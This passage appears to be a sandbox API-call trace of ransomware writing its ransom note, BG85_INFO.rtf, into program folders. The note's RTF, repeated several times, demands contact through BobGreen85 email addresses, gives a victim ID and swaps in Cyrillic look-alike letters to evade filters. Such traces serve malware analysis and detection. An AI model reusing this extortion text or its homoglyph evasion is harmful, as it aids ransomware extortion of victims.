t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.557] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.558] CloseHandle (hObject=0x1fc) returned 1 [0064.559] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\bg85_info.rtf")) returned 0xffffffff [0064.559] GetLastError () returned 0x2 [0064.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.559] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.559] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm 